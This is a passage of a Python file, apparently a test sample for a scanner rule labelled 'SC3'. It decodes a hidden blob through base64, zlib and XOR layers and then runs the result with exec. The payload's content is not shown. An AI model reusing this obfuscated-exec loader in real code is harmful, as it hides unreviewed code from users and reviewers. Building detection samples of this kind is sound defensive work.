FpvRmS7jVRFsRgO2LC1//N6WLaJskJsP5fx3Rd5MgHuxuM6G4EbtpXvfQH8fSgsP1NP7f52LJt2jYzZUvN97oHsQepxDNnHa6zG2A5btvTCT/EoW1vj/AF5CnLo="
_K = bytes.fromhex("c4b8399181422f85acf5bfbb")

def _xor(buf, k):
    return bytes(b ^ k[i % len(k)] for i, b in enumerate(buf))

def _decode():
    inner = zlib.decompress(base64.b64decode(_OUTER))
    return _xor(base64.b64decode(inner), _K).decode("utf-8")

if __name__ == "__main__":
    # SC3 signature: base64.b64decode(...) -> exec / compile near by
    exec(compile(_decode(), "<runtime>", "exec"), {})
